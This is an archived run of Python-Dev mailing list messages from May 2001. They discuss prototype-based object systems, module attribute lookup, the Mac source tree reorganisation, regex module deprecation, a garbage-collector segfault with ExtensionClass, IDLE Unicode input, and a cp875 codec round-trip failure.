IMHO, make a lot less sense for dynamic languages. If Py3K were to be a clean start, I'ld urge basing it on prototypes, but as an incremental creation -- I don't know how to get there from here (unless it could sneak in under the implementation covers!) BTW: XlispStat, which has a prototype object system with multiple inheritence also doesn't have "super" -- there is a (call-next-method [ args... ]) function/macro which searches for the base classes. I'm sure there's a lower level function to just get the next method, but typically, call-next-method is what's used. There is no search for non-method attributes, as all of the base class instance vars are merged and made into slots of the instance itself. ( There's no class variables -- there's no classes.) The closest python equivalent would be, as has been discussed in this thread, a super method or function that does attribute lookup on the bases. -- Steve Majewski From nas at python.ca Fri May 11 16:06:39 2001 From: nas at python.ca (Neil Schemenauer) Date: Fri, 11 May 2001 07:06:39 -0700 Subject: [Python-Dev] Re: Change module attribute get & set In-Reply-To: ; from noreply@sourceforge.net on Fri, May 11, 2001 at 06:35:28AM -0700 References: Message-ID: <20010511070639.A1402@glacier.fnational.com> noreply at sourceforge.net wrote: > Module objects currently don't define the tp_getattro > or tp_setattro slots. As a result, interning of > attribute names does them no good: a char* is always > passed, so the dict lookup always needs to do a string > compare despite that the attribute name is interned. I think this is a problem in classobject.c:generic_binary_op as well. PyObject_GetAttrString is always used. I believe the old code interned names like "__add__" and used PyObject_GetAttr. Is it worth fixing this? Neil From guido at digicool.com Fri May 11 17:13:56 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 10:13:56 -0500 Subject: [Python-Dev] Re: Change module attribute get & set In-Reply-To: Your message of "Fri, 11 May 2001 07:06:39 MST." <20010511070639.A1402@glacier.fnational.com> References: <20010511070639.A1402@glacier.fnational.com> Message-ID: <200105111513.KAA04872@cj20424-a.reston1.va.home.com> > I think this is a problem in classobject.c:generic_binary_op as > well. PyObject_GetAttrString is always used. I believe the old > code interned names like "__add__" and used PyObject_GetAttr. Is > it worth fixing this? Maybe. I'd give this low priority. If my descriptor branch work goes well, most of classobject.c *may* disappear in favor of the newly swollen typeobject.c. ;-) --Guido van Rossum (home page: http://www.python.org/~guido/) From jack at oratrix.nl Fri May 11 16:29:24 2001 From: jack at oratrix.nl (Jack Jansen) Date: Fri, 11 May 2001 16:29:24 +0200 Subject: [Python-Dev] Mac CVS repository moved to sourceforge Message-ID: <20010511142924.C8037303181@snelboot.oratrix.nl> Folks, the Python/Mac repository has been moved to sourceforge, and is integrated with the general Python repository, so from now on a single CVS tree suficces to build MacPython. I'm setting the old pythoncvs.oratrix.nl repository to readonly for a few more weeks and then it'll disappear. Note that the pythoncvs.oratrix.nl repository is still the source for some of the optional libraries you need to build MacPython, but that's only if you want to build it completely from CVS. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From martin at loewis.home.cs.tu-berlin.de Fri May 11 16:41:33 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 11 May 2001 16:41:33 +0200 Subject: [Python-Dev] Mac hierarchy backwards Message-ID: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> First, thanks to Jack Jansen for integrating the Mac sources; this is a good thing. It seems, however, that some of the directory structure is backwards: Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There may be others of this kind. I also wonder whether all these files are still needed, and meant to be distributed. E.g. I see chdir.c having the comment /* Chdir for the Macintosh. Public domain by Guido van Rossum, CWI, Amsterdam (July 1987). Pathnames must be Macintosh paths, with colons as separators. */ Is it really the case that the Mac API hasn't grown a chdir call in 13 years? Regards, Martin From fdrake at acm.org Fri May 11 16:55:33 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Fri, 11 May 2001 10:55:33 -0400 (EDT) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> References: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> Message-ID: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com> Martin v. Loewis writes: > It seems, however, that some of the directory structure is backwards: > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There > may be others of this kind. I agree that this should be the goal; I don't know if Jack's release procedure would need to be revised before that can happen. If so, I'd encourage him to do so. > Is it really the case that the Mac API hasn't grown a chdir call in 13 > years? Yikes! I just search developer.apple.com for "chdir" and came up with no hits, but I really don't know just what that tells me. chdir() is required for POSIX compliance, but it isn't mentioned in the C9X final committee draft. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From jack at oratrix.nl Fri May 11 16:56:39 2001 From: jack at oratrix.nl (Jack Jansen) Date: Fri, 11 May 2001 16:56:39 +0200 Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: Message by "Martin v. Loewis" , Fri, 11 May 2001 16:41:33 +0200 , <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> Message-ID: <20010511145640.9FCB5303181@snelboot.oratrix.nl> > It seems, however, that some of the directory structure is backwards: > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There > may be others of this kind. Yes, now that the Mac stuff is integrated with the mainstream again this might be a good idea. > I also wonder whether all these files are still needed, and meant to > be distributed. E.g. I see chdir.c having the comment > > /* Chdir for the Macintosh. > Public domain by Guido van Rossum, CWI, Amsterdam (July 1987). > Pathnames must be Macintosh paths, with colons as separators. */ > > Is it really the case that the Mac API hasn't grown a chdir call in 13 > years? Hmm, hmm, I'm unsure. MacOS (<= 9) itself doesn't have chdir, because it doesn't believe in current directories (by design. Whether I agree with the design is a different matter:-). Normally MacPython is built with a special unix-compatibility library, GUSI, which does provide these calls. However, it is still possible to build without GUSI, and actually in the process of porting MacPython to Carbon ("MacOSX in it's MacOS API model") I've used these compatibility routines again, until I finally got GUSI ported. But its easy enough to cvs-remove them from the normal tree, to be revived when needed. What do people think? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From pedroni at inf.ethz.ch Fri May 11 16:56:48 2001 From: pedroni at inf.ethz.ch (Samuele Pedroni) Date: Fri, 11 May 2001 16:56:48 +0200 (MET DST) Subject: [Python-Dev] Type/class Message-ID: <200105111456.QAA00228@core.inf.ethz.ch> Hi. > > Reading up on MetaClasses in Smalltalk again makes me appreciate > the simplicity of a prototype system where everything is just > an object -- all objects can be cloned, and some objects are > only used for cloning -- they are the exemplars of their type > which fill the role of Classes. > I agree, I often read that Smalltalk is "simple" up to metaclasses, on the other hand the casual user can just ignore them. > Unfortunately, although prototypes would be a lot simpler, it > would be a pretty incompatible change for Python -- I can't think > of any way to get there without a lot of breakage. > > (Still -- I wonder if there's a way they could be used under > the covers in the implementation to make it simpler. Prototype > semantics are basically a superset of Class based semantics, which > is how it was easy to do Smalltalk in Self.) > [Ignoring the fact that code and changes require coders] Thinking in terms of proto-objects, parent slots and list parent slots: python instance I have data slots and a parent slot __class__, python classe G have data slots and a list parent slot __bases__, then we have the python rules (not very uniforms): function from I directly => function function from I.__class__ => bound method function from C => unbound method That's the difficult part for every model that aims to remain compatible. Samuele Pedroni. From thomas.heller at ion-tof.com Fri May 11 17:40:10 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Fri, 11 May 2001 17:40:10 +0200 Subject: [Python-Dev] Type/class References: Message-ID: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook> > Reading up on MetaClasses in Smalltalk again makes me appreciate > the simplicity of a prototype system where everything is just > an object -- all objects can be cloned, and some objects are > only used for cloning -- they are the exemplars of their type > which fill the role of Classes. > > Unfortunately, although prototypes would be a lot simpler, it > would be a pretty incompatible change for Python -- I can't think > of any way to get there without a lot of breakage. > > (Still -- I wonder if there's a way they could be used under > the covers in the implementation to make it simpler. Prototype > semantics are basically a superset of Class based semantics, which > is how it was easy to do Smalltalk in Self.) I never looked at Self or other prototype based systems. Is it really true that prototypes are a lot simpler than metaclasses, but on the other hand more powerful? The 'brain exploding properties' of metaclasses are IMO only there because my brain cannot think easily in too many recursion steps... Thomas From fdrake at acm.org Fri May 11 18:25:54 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Fri, 11 May 2001 12:25:54 -0400 (EDT) Subject: [Python-Dev] status of pre? Message-ID: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> Have we formulated a plan of action regarding PCRE and the pre module? Are we planning to leave them in for another version, or is SRE considered sufficiently stable? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From sdm7g at Virginia.EDU Fri May 11 18:29:30 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 12:29:30 -0400 (EDT) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com> Message-ID: On Fri, 11 May 2001, Fred L. Drake, Jr. wrote: > > Martin v. Loewis writes: > > Is it really the case that the Mac API hasn't grown a chdir call in 13 > > years? > > Yikes! I just search developer.apple.com for "chdir" and came up > with no hits, but I really don't know just what that tells me. > chdir() is required for POSIX compliance, but it isn't mentioned in > the C9X final committee draft. There isn't a chdir in any of the pre-OSX Mac *system* libraries, and Mac has never claimed any POSIX compliance (even with OSX, they have officially said it's almost certainly POSIX compliant but they have no plans for now to got thru the hoops and paperwork to get it certified.) chdir is in unistd.h, which isn't part of the standard C library. However, Metrowerks *compiler* and IDE for the Mac does include in MSL (Metrowerks Standard Library) a unistd.[hc] with chdir. ( MW selling development tools obviously has more interest in being POSIX compliant than Apple! ) I don't know if there's one in the MPW libraries, so maybe you still want to leave it there. -- Steve Majewski From guido at digicool.com Fri May 11 20:47:38 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 13:47:38 -0500 Subject: [Python-Dev] status of pre? In-Reply-To: Your message of "Fri, 11 May 2001 12:25:54 -0400." <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> Message-ID: <200105111847.NAA05835@cj20424-a.reston1.va.home.com> > Have we formulated a plan of action regarding PCRE and the pre > module? Are we planning to leave them in for another version, or is > SRE considered sufficiently stable? Hm. It should disappear but I believe I've heard people say they were focred to use it because of the recursion limit problems with SRE on some platforms. We could put a warning on using pre or pcre in 2.2, and remove it in 2.3, hoping that /F fixes the recursion limit problems in the mean time (weren't those related to the backtracking implementation)? --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Fri May 11 22:41:30 2001 From: skip at pobox.com (skip at pobox.com) Date: Fri, 11 May 2001 15:41:30 -0500 Subject: [Python-Dev] GC and ExtensionClass Message-ID: <15100.20090.573866.569667@beluga.mojam.com> Has anyone investigated interactions between ExtensionClass objects and GC? I've encountered segfaults with 2.1 in certain situations when using the latest PyGtk stuff. The gdb traceback (appended) sort of suggests the two intersect somewhere. PyGtk provides a Python interface to the Gtk widget get using ExtensionClasses. Any ideas how I should approach the problem? I don't know either piece of code at all and the code that generates the segfault isn't particularly small, not to mention which it uses the bleeding edge Gtk stuff (which I doubt anyone on this list will have installed) and a version of ExtensionClass patched by James Henstridge, the PyGtk author. Here's what I know: 1. Disabling gc gets rid of the segfault 2. I only see the problem with importing a specific module that subclasses the GtkTextView widget from the Python command line. If I run it as a script from the shell prompt, I get no segfault. 3. If I first import the gtk module, then import my module, I get no segfault. 4. Most changes I make to the module causing the problem cause the problemm to disappear. All told, all this really tells me is I'm probably dealing with a malloc/free problem of some sort. Neil and/or Jim (and/or anyone else willing to look into this problem), I can give you access to my development machine via ssh if you think that would help debug the problem. Skip #0 0x0807163d in visit_decref (op=0x4034ece0, data=0x0) at ../Modules/gcmodule.c:153 #1 0x08096dc6 in tupletraverse (o=0x8290d6c, visit=0x8071630 , arg=0x0) at ../Objects/tupleobject.c:366 #2 0x08071672 in subtract_refs (containers=0x80b8ac0) at ../Modules/gcmodule.c:167 #3 0x08071abf in collect (young=0x80b8ac0, old=0x80b8acc) at ../Modules/gcmodule.c:379 #4 0x08071d53 in collect_generations () at ../Modules/gcmodule.c:484 #5 0x08071db7 in _PyGC_Insert (op=0x82ea9c4) at ../Modules/gcmodule.c:507 #6 0x0808d743 in PyDict_New () at ../Objects/dictobject.c:149 #7 0x401ef977 in getBaseDictionary (type=0x4034d320) at ExtensionClass.c:1244 #8 0x401f0979 in initializeBaseExtensionClass (self=0x4034d320) at ExtensionClass.c:1485 #9 0x401f6774 in export_subclassed_type (dict=0x82d33a4, name=0x40337c55 "GtkTreeViewColumn", typ=0x4034d320, bases=0x82ea9a4) at ExtensionClass.c:3410 #10 0x4022a360 in pygobject_register_class (dict=0x82d33a4, class_name=0x40337c55 "GtkTreeViewColumn", get_type=0x404c4080 , ec=0x4034d320, bases=0x82ea9a4) at gobjectmodule.c:202 #11 0x4032fd7e in pygtk_register_classes (d=0x82d33a4) at gtk.c:30071 #12 0x402f0ed0 in init_gtk () at gtkmodule.c:98 #13 0x0806927c in _PyImport_LoadDynamicModule (name=0xbfffcd00 "gtk._gtk", pathname=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", fp=0x82ab6e0) at ../Python/importdl.c:52 #14 0x08067780 in load_module (name=0xbfffcd00 "gtk._gtk", fp=0x82ab6e0, buf=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", type=3) at ../Python/import.c:1296 #15 0x080683eb in import_submodule (mod=0x82963bc, subname=0xbfffcd04 "_gtk", fullname=0xbfffcd00 "gtk._gtk") at ../Python/import.c:1815 #16 0x08067f6a in load_next (mod=0x82963bc, altmod=0x80bf3cc, p_name=0xbfffd130, buf=0xbfffcd00 "gtk._gtk", p_buflen=0xbfffccfc) at ../Python/import.c:1671 #17 0x08067bcc in import_module_ex (name=0x0, globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1522 #18 0x08067d23 in PyImport_ImportModuleEx (name=0x8290aac "_gtk", globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1563 #19 0x0809f4b9 in builtin___import__ (self=0x0, args=0x8291124) at ../Python/bltinmodule.c:31 #20 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2838 #21 0x080590d5 in call_object (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2801 #22 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2734 #23 0x08057764 in eval_code2 (co=0x82910d0, globals=0x8295f1c, locals=0x8295f1c, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #24 0x08055085 in PyEval_EvalCode (co=0x82910d0, globals=0x8295f1c, locals=0x8295f1c) at ../Python/ceval.c:346 #25 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffe0b0 "gtk", co=0x82910d0, pathname=0xbfffd340 "/usr/local/lib/python2.1/site-packages/gtk/__init__.pyc") at ../Python/import.c:490 #26 0x08066fc7 in load_source_module (name=0xbfffe0b0 "gtk", pathname=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", fp=0x80d1a20) at ../Python/import.c:754 #27 0x0806775e in load_module (name=0xbfffe0b0 "gtk", fp=0x80d1a20, buf=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", type=1) at ../Python/import.c:1287 #28 0x08067129 in load_package (name=0xbfffe0b0 "gtk", pathname=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk") at ../Python/import.c:811 #29 0x08067791 in load_module (name=0xbfffe0b0 "gtk", fp=0x0, buf=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk", type=5) at ../Python/import.c:1310 #30 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffe0b0 "gtk", fullname=0xbfffe0b0 "gtk") at ../Python/import.c:1815 #31 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, p_name=0xbfffe4e0, buf=0xbfffe0b0 "gtk", p_buflen=0xbfffe0ac) at ../Python/import.c:1671 #32 0x08067bcc in import_module_ex (name=0x0, globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1522 #33 0x08067d23 in PyImport_ImportModuleEx (name=0x811556c "gtk", globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1563 #34 0x0809f4b9 in builtin___import__ (self=0x0, args=0x829651c) at ../Python/bltinmodule.c:31 #35 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2838 #36 0x080590d5 in call_object (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2801 #37 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2734 #38 0x08057764 in eval_code2 (co=0x82968b8, globals=0x828c3fc, locals=0x828c3fc, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #39 0x08055085 in PyEval_EvalCode (co=0x82968b8, globals=0x828c3fc, locals=0x828c3fc) at ../Python/ceval.c:346 #40 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffeff0 "seg", co=0x82968b8, pathname=0xbfffe6f0 "seg.pyc") at ../Python/import.c:490 #41 0x08066fc7 in load_source_module (name=0xbfffeff0 "seg", pathname=0xbfffeb60 "seg.py", fp=0x820cd60) at ../Python/import.c:754 #42 0x0806775e in load_module (name=0xbfffeff0 "seg", fp=0x820cd60, buf=0xbfffeb60 "seg.py", type=1) at ../Python/import.c:1287 #43 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffeff0 "seg", fullname=0xbfffeff0 "seg") at ../Python/import.c:1815 #44 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, p_name=0xbffff420, buf=0xbfffeff0 "seg", p_buflen=0xbfffefec) at ../Python/import.c:1671 #45 0x08067bcc in import_module_ex (name=0x0, globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1522 #46 0x08067d23 in PyImport_ImportModuleEx (name=0x828c61c "seg", globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1563 #47 0x0809f4b9 in builtin___import__ (self=0x0, args=0x80e7bc4) at ../Python/bltinmodule.c:31 #48 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2838 #49 0x080590d5 in call_object (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2801 #50 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2734 #51 0x08057764 in eval_code2 (co=0x8115908, globals=0x80d21e4, locals=0x80d21e4, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #52 0x08055085 in PyEval_EvalCode (co=0x8115908, globals=0x80d21e4, locals=0x80d21e4) at ../Python/ceval.c:346 #53 0x0806da1f in run_node (n=0x8115558, filename=0x80a496d "", globals=0x80d21e4, locals=0x80d21e4, flags=0xbffff708) at ../Python/pythonrun.c:1045 #54 0x0806cb2a in PyRun_InteractiveOneFlags (fp=0x4018e620, filename=0x80a496d "", flags=0xbffff708) at ../Python/pythonrun.c:570 #55 0x0806c98c in PyRun_InteractiveLoopFlags (fp=0x4018e620, filename=0x80a496d "", flags=0xbffff708) at ../Python/pythonrun.c:510 #56 0x0806c85a in PyRun_AnyFileExFlags (fp=0x4018e620, filename=0x80a496d "", closeit=0, flags=0xbffff708) at ../Python/pythonrun.c:473 #57 0x08051fae in Py_Main (argc=1, argv=0xbffff78c) at ../Modules/main.c:320 #58 0x400831f0 in __libc_start_main () from /lib/libc.so.6 From guido at digicool.com Fri May 11 23:49:00 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 16:49:00 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Fri, 11 May 2001 15:41:30 EST." <15100.20090.573866.569667@beluga.mojam.com> References: <15100.20090.573866.569667@beluga.mojam.com> Message-ID: <200105112149.QAA07533@cj20424-a.reston1.va.home.com> > Has anyone investigated interactions between ExtensionClass objects and GC? > I've encountered segfaults with 2.1 in certain situations when using the > latest PyGtk stuff. The gdb traceback (appended) sort of suggests the two > intersect somewhere. PyGtk provides a Python interface to the Gtk widget > get using ExtensionClasses. Any ideas how I should approach the problem? I > don't know either piece of code at all and the code that generates the > segfault isn't particularly small, not to mention which it uses the bleeding > edge Gtk stuff (which I doubt anyone on this list will have installed) and a > version of ExtensionClass patched by James Henstridge, the PyGtk author. > > Here's what I know: > > 1. Disabling gc gets rid of the segfault > 2. I only see the problem with importing a specific module that > subclasses the GtkTextView widget from the Python command line. If I > run it as a script from the shell prompt, I get no segfault. > 3. If I first import the gtk module, then import my module, I get no > segfault. > 4. Most changes I make to the module causing the problem cause the > problemm to disappear. > > All told, all this really tells me is I'm probably dealing with a > malloc/free problem of some sort. > > Neil and/or Jim (and/or anyone else willing to look into this problem), I > can give you access to my development machine via ssh if you think that > would help debug the problem. AFAIK, the latest version of Zope (which uses ExtensionClass extensively if not exclusively :-) works fine with Python 2.1. This suggests pointing a finger towards the PyGtk code... :-( --Guido van Rossum (home page: http://www.python.org/~guido/) From loewis at informatik.hu-berlin.de Fri May 11 22:53:55 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Fri, 11 May 2001 22:53:55 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters Message-ID: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Thanks to a bug report I got, I noticed for the first time that you cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell prompt, you may get >>> s='??' UnicodeError: ASCII encoding error: ordinal not in range(128) Likewise, when trying to save a file that has non-ASCII characters, you get a traceback. Now, I think I understand all the causes of the problem (Tkinter returning Unicode objects, and so on). However, I'm curious whether anybody has proposals on how to deal with it. For saving text files, if Python had an encoding directive, things might be easier :-) For the shell prompt, I've no idea how to solve this best. So any suggestions are welcome. Regards, Martin From fredrik at pythonware.com Sat May 12 00:18:27 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Sat, 12 May 2001 00:18:27 +0200 Subject: [Python-Dev] status of pre? References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com> Message-ID: <00ca01c0da68$4fc66570$e46940d5@hagrid> guido wrote: > > We could put a warning on using pre or pcre in 2.2, and remove it in > 2.3, hoping that /F fixes the recursion limit problems in the mean > time (weren't those related to the backtracking implementation)? 2.2 is to be released in october, right? I'm sure I could shake out the remaining bugs in my "stackless SRE" patch until then... Cheers /F From fredrik at effbot.org Sat May 12 01:03:10 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Sat, 12 May 2001 01:03:10 +0200 Subject: [Python-Dev] Hats off to them! Message-ID: <014a01c0da6e$93578ca0$e46940d5@hagrid> http://www.theregister.co.uk/content/4/18909.html "Microsoft Altair BASIC legend talks about Linux, CPRM and that very frightening photo ... His other passion, he tells us, is Python. "Hats off to them. It's an extremely well designed language. It's object orientated from the get-go. They've really succeeded there," he says, and commends it as the ideal teaching language. That used to be BASIC, of course" ... (no, it's not Bill) Cheers /F From fredrik at effbot.org Sat May 12 01:14:47 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Sat, 12 May 2001 01:14:47 +0200 Subject: [Python-Dev] Hats off to them! References: <014a01c0da6e$93578ca0$e46940d5@hagrid> Message-ID: <015001c0da70$3078cf70$e46940d5@hagrid> > "Hats off to them. It's an extremely well designed language. It's > object orientated from the get-go. They've really succeeded there," > he says, and commends it as the ideal teaching language. That > used to be BASIC, of course" reading on, I'm not sure why BASIC ever was the ideal teaching language: http://www.americanhistory.si.edu/csr/comphist/gates.htm#tc11 "One of the nice things about this BASIC is it has this so called direct mode. So you can PRINT 2 + 2. It prints the square root of ten" Cheers /F From sdm7g at Virginia.EDU Sat May 12 04:43:31 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 22:43:31 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook> Message-ID: On Fri, 11 May 2001, Thomas Heller wrote: > I never looked at Self or other prototype based systems. > Is it really true that prototypes are a lot simpler than > metaclasses, but on the other hand more powerful? Definitely simpler: No classes, No metaclasses, only objects. Ignore for now the fact that a limited set of classes are handier for a statically type checked language and just consider dynamic languages, which is their proper domain. Prototype semantics basicalaly subsume class semantics. Any object can be an exemplar and fill the role of a class, and it can be used ONLY as a template and holder of shared behaviour, so it can be used like a class. [One of the self papers -- one which I haven't read -- is entitled "Self includes Smalltalk" -- and is, I believe, a demonstration that SmallTalk is sort of a subset of Self.] But you can also have finer grain classification and you can have object inheritance. ( This is handly in XlispStat, which is oriented towards statistics and analysis: you can have derived objects, for example different subsamples of the same population, or in my app, different energy spectra, along with derived and processed spectra with special rules for treatment: e.g. linear filtered spectra have a filter function or kernel, and if they are fit against reference spectra, they need to be fit against references that have had the same filter applied to them -- if none available create one from unfiltered samples -- and maybe a whole chain of derived data. In a class based system, you would have to manually maintain a separate linked list of objects, but in a prototype system they can all be cloned from their parent objects. ) The other plus for things like exploratory statistics is that you don't have to design a class hierarchy ahead of time -- it more concrete and less abstract than a class based system. Prototypes can also solve some of the sort of problems that Jim Fultons acquisition framework in Zope is designed to handle. (But it's been a while since I read that paper and I haven't used it, so I'm relying on my memory of thinking "Yeah -- that would be simpler with prototypes" ) You definitely don't have to worry about simulating the Prototype Pattern. (I've seen GUI systems in C++ that go thru a lot of code to add prototype-like behavior to C++ classes.) But -- unless I can figure a useful way to use it under the covers, it's not really a topic for python-dev. > The 'brain exploding properties' of metaclasses are IMO > only there because my brain cannot think easily in too > many recursion steps... It's just like spelling bananana -- the problem is to know when to stop! ;-) -- Steve Majewski From tim_one at email.msn.com Sat May 12 13:28:27 2001 From: tim_one at email.msn.com (Tim Peters) Date: Sat, 12 May 2001 07:28:27 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? Message-ID: I have a way to make dict lookup a teensy bit cheaper(*) that significantly reduces the number of collisions (which is much more valuable). This caused a number of std tests to fail, because they were implicitly relying on the order in which a dict's entries are materialized via .keys() or .items(). Most of these were easy enough to fix. The last failure remaining is test_unicode, and I don't know how to fix it. It's dying here: try: verify(unicode(s,encoding).encode(encoding) == s) except TestFailed: print '*** codec "%s" failed round-trip' % encoding except ValueError,why: print '*** codec for "%s" failed: %s' % (encoding, why) when encoding == "cp875". There's a bogus problem you have to worm around first: test_unicode neglected to import TestFailed, so it actually dies with NameError while trying the "except TestFailed" clause after verify() raises TestFailed. Once that's repaired, it's complaining about failing the round-trip encoding. The original character in s it's griping about is "?" (0x3f). cp875.py has this entry in its decoding_map dict: 0x003f: 0x001a, # SUBSTITUTE But 0x1a is not a *unique* value in this dict. There's also 0x00dc: 0x001a, # SUBSTITUTE 0x00e1: 0x001a, # SUBSTITUTE 0x00ec: 0x001a, # SUBSTITUTE 0x00ed: 0x001a, # SUBSTITUTE 0x00fc: 0x001a, # SUBSTITUTE 0x00fd: 0x001a, # SUBSTITUTE Therefore what appears associated with 0x1a in the derived encoding_map dict: encoding_map = {} for k,v in decoding_map.items(): encoding_map[v] = k may end up being any of the 7 decoding_map keys that map to 0x1a. It just so happened to map back to 0x3f before, but to 0xfd after the dict change, so "?" doesn't survive the round trip anymore. My knowledge of encoding internals is exceeded only by my mastery of file URLs under Windows , so I could sure use some help getting this repaired. I'd really like to check in the dict improvement (+ test repairs), but won't do it so long as it makes a std test fail. If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings winning the game, then iterating over decoding_map.items() in reverse sorted order would do the trick reliablly. But I don't know whether the ambiguity in cp875 is a bug or an undocumented feature ... 7-bit-ascii-looks-better-every-day-ly y'rs - tim (*) Simply by taking the damn "~" off "~hash" -- I explained quite a while ago why that can lead to a weak form of clustering "in theory", and instrumenting the dict lookup code confirmed that it does hurt in real life. From guido at digicool.com Sat May 12 14:28:23 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 07:28:23 -0500 Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: Your message of "Fri, 11 May 2001 22:43:31 -0400." References: Message-ID: <200105121228.HAA08988@cj20424-a.reston1.va.home.com> Do prototype-based language have the equivalence of multiple inheritance? --Guido van Rossum (home page: http://www.python.org/~guido/) From tim_one at email.msn.com Sat May 12 14:16:33 2001 From: tim_one at email.msn.com (Tim Peters) Date: Sat, 12 May 2001 08:16:33 -0400 Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: <200105121228.HAA08988@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Do prototype-based language have the equivalence of multiple > inheritance? Just as for class-based languages, whether a prototype-based language supports an MI workalike varies by language. In a class-based language with MI, a class can have multiple base classes; in a prototype-based language with an MI workalike, an object can have multiple prototype objects. The same kinds of ambiguities can arise, and the same kinds of resolution strategies are applicable (imposed linearization; user-supplied qualification; user-supplied renaming; guessing <0.7 wink>). JavaScript is the best-known prototype language that does not support multiple prototypes per object. A very readable intro to its object model is here: http://developer.netscape.com/docs/manuals/communicator/jsobj/jsobj.pdf It's interesting because, near the end, the author explores a bit how far you can get *trying* to fake MI in JS. The answer is "farther than you might 